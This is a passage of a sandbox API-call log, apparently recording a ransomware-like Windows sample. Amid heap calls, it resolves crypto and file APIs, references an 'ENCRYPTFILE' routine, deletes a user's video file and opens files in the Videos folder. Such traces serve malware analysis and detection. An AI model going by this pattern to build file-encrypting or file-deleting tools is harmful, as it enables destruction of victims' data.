lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0096.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0096.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0096.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0096.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0096.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0096.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0096.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0096.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0096.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0096.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0096.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0096.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0096.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0096.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0096.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0096.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0096.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0096.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0096.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0096.439] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0096.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0096.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0096.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0096.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0096.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0096.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0096.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0096.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0096.440] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0096.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0096.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0096.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f20 [0096.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0096.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0096.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0096.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0096.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0096.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0096.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0096.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0096.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0096.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0096.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0096.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0096.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0096.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0096.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0096.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0096.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0096.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0096.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0096.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0096.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0096.442] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0096.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0096.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0096.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0096.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0096.442] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0096.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0096.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9fe0 [0096.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0096.442] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0096.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0096.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0096.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0096.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0096.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0096.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0096.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0096.442] FreeLibrary (hLibModule=0x756e0000) returned 1 [0096.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0096.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0096.443] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0096.443] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0096.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.443] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0096.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0096.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0096.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0096.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0096.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0096.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0096.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0096.443] CloseHandle (hObject=0x298) returned 1 [0096.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0096.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0096.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ed3b0 | out: hHeap=0x1780000) returned 1 [0096.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0096.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0096.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0096.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0096.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0096.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0096.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0096.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0096.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0096.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0096.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0096.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0096.444] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0096.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0096.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0096.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0096.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0096.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0096.444] CloseHandle (hObject=0x258) returned 1 [0096.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0096.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0096.552] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\-frmf8je.swf", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\-frmf8je.swf", lpFilePart=0x0) returned 0x23 [0096.552] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\-frmf8je.swf" (normalized: "c:\\users\\fd1hvy\\videos\\-frmf8je.swf")) returned 0x20 [0096.552] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\-frmf8je.swf", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca44c10, ftCreationTime.dwHighDateTime=0x1d5e81e, ftLastAccessTime.dwLowDateTime=0x42d38240, ftLastAccessTime.dwHighDateTime=0x1d5e55b, ftLastWriteTime.dwLowDateTime=0x42d38240, ftLastWriteTime.dwHighDateTime=0x1d5e55b, nFileSizeHigh=0x0, nFileSizeLow=0xcc1f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="-frmf8je.swf", cAlternateFileName="")) returned 0x41ac500 [0096.553] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\-frmf8je.swf" (normalized: "c:\\users\\fd1hvy\\videos\\-frmf8je.swf")) returned 1 [0096.554] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca44c10, ftCreationTime.dwHighDateTime=0x1d5e81e, ftLastAccessTime.dwLowDateTime=0x42d38240, ftLastAccessTime.dwHighDateTime=0x1d5e55b, ftLastWriteTime.dwLowDateTime=0x42d38240, ftLastWriteTime.dwHighDateTime=0x1d5e55b, nFileSizeHigh=0x0, nFileSizeLow=0xcc1f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="-frmf8je.swf", cAlternateFileName="")) returned 0 [0096.554] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0096.555] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0096.555] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac740 [0096.555] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0096.555] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0096.555] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0096.555] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0096.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43c9e90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0096.556] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\videos\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0096.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0096.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0096.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0096.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0096.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0096.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0096.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0096.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0096.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0096.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0096.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0096.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a030 [0096.556] FreeLibrary (hLibModule=0x772d0000) returned 1 [0096.639] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0096.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0096.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0096.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0096.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cf8 [0096.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9cf8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0096.640] CloseHandle (hObject=0x258) returned 1 [0096.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0096.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0096.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0096.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0096.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0096.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0096.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0096.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0096.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0096.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0096.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0096.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.641] FreeLibrary (hLibModule=0x772d0000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0096.641] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, 